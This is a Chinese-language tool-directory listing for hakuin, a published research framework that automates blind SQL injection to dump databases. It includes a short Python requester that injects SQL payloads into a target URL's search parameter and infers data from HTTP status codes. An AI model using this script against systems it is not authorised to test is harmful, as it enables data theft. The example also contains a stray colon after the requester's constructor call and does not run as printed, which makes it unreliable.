Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
hakuin — 一个极速且完全可配置的盲SQL注入优化与自动化框架。 | Kitploit
工具/GitHubGitHub/pruzko/hakuin
漏洞扫描器Web安全渗透测试
GitHubpruzko/hakuin

hakuin

一个极速且完全可配置的盲SQL注入优化与自动化框架。

查看仓库
141101年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Hakuin 是一个使用 Python 3 编写的盲 SQL 注入 (BSQLI) 优化与自动化框架。它抽象化了数据提取逻辑,允许用户轻松高效地从易受攻击的 Web 应用程序中转储数据库。为了加速这一过程,Hakuin 使用了多种优化方法,包括预训练和自适应语言模型、机会性猜测、统计建模、并行化、三元查询等。

Hakuin 曾在以下知名学术与行业会议上进行展示:

  • BSides,布拉迪斯拉发,2025
  • BlackHat MEA,利雅得,2023
  • Hack in the Box,普吉岛,2023
  • IEEE S&P 攻防技术研讨会 (WOOT),2023

更多信息请参阅我们的论文和幻灯片。

安装

要安装 Hakuin,只需运行:

root@kitploit:~
pip3 install hakuin

命令行工具

Hakuin 附带一个直观的工具,可直接从命令行使用 Hakuin 的大部分功能:

root@kitploit:~
hk -h

自定义脚本

有时,BSQLI 漏洞过于棘手,无法通过命令行利用,需要自定义脚本。这正是 Hakuin 的强项,它允许您完全自定义一切——注入逻辑、推理逻辑,甚至查询语句。

以下是一个最小示例:

root@kitploit:~
import asyncio
import aiohttp
from hakuin import Extractor, Requester

class SimpleRequester(Requester):
    async def request(self, query, ctx):
        payload = query.render(ctx)
        url = f'http://target.com/users?search=XXX" OR ({payload})--'
        async with aiohttp.request('GET', url) as resp:
            return resp.status == 200

async def main():
    requester = SimpleRequester():
    ext = Extractor(requester=requester, dbms='sqlite')
    data = await ext.extract_table_names()
    print(data)

asyncio.run(main())

请务必查阅我们的教程。

研究人员

本仓库正在积极开发,以满足安全从业者的需求。希望重现论文中所述实验的研究人员应安装冻结版本,其中包含原始代码、实验脚本以及结果复现指导手册。

引用 Hakuin

root@kitploit:~
@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}
下载工具